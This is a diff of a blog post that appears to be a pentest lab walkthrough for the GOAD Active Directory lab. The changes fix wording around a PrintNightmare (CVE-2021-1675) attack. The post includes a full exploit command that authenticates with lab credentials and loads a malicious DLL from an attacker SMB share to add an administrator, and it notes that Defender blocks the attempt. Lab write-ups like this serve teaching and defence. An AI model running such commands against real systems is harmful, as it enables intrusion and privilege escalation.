Mayfly277/mayfly277.github.io/_posts/2022-07-20-GOADv2-pwning-part5.md

 python3 CVE-2021-1675.py north.sevenkingdoms.local/jon.snow:'iknownothing'@north.sevenkingdoms.local '\\192.168.56.1\ATTACKERSHARE\nightmare.dll'
 ```

-- And it work too but the user is not in the administrators group :(
+- And it works too but the user is not in the administrators group :(
 - Nothing due to the exploit, it is just our dll who add a user as administrator who get caught when user is setup as administrator

 ![defender.png](/assets/blog/GOAD/defender.png)

-- And good think to know, after some failures the spooler service will be stopped by defender and no more exploit for you until someone restart the server or the spooler service.
+- Good (thing) to know : after some failures the spooler service will be stopped by defender and no more exploit for you until someone restart the server or the spooler service.

 - Let's change the payload with another code (source : https://github.com/newsoft/adduser )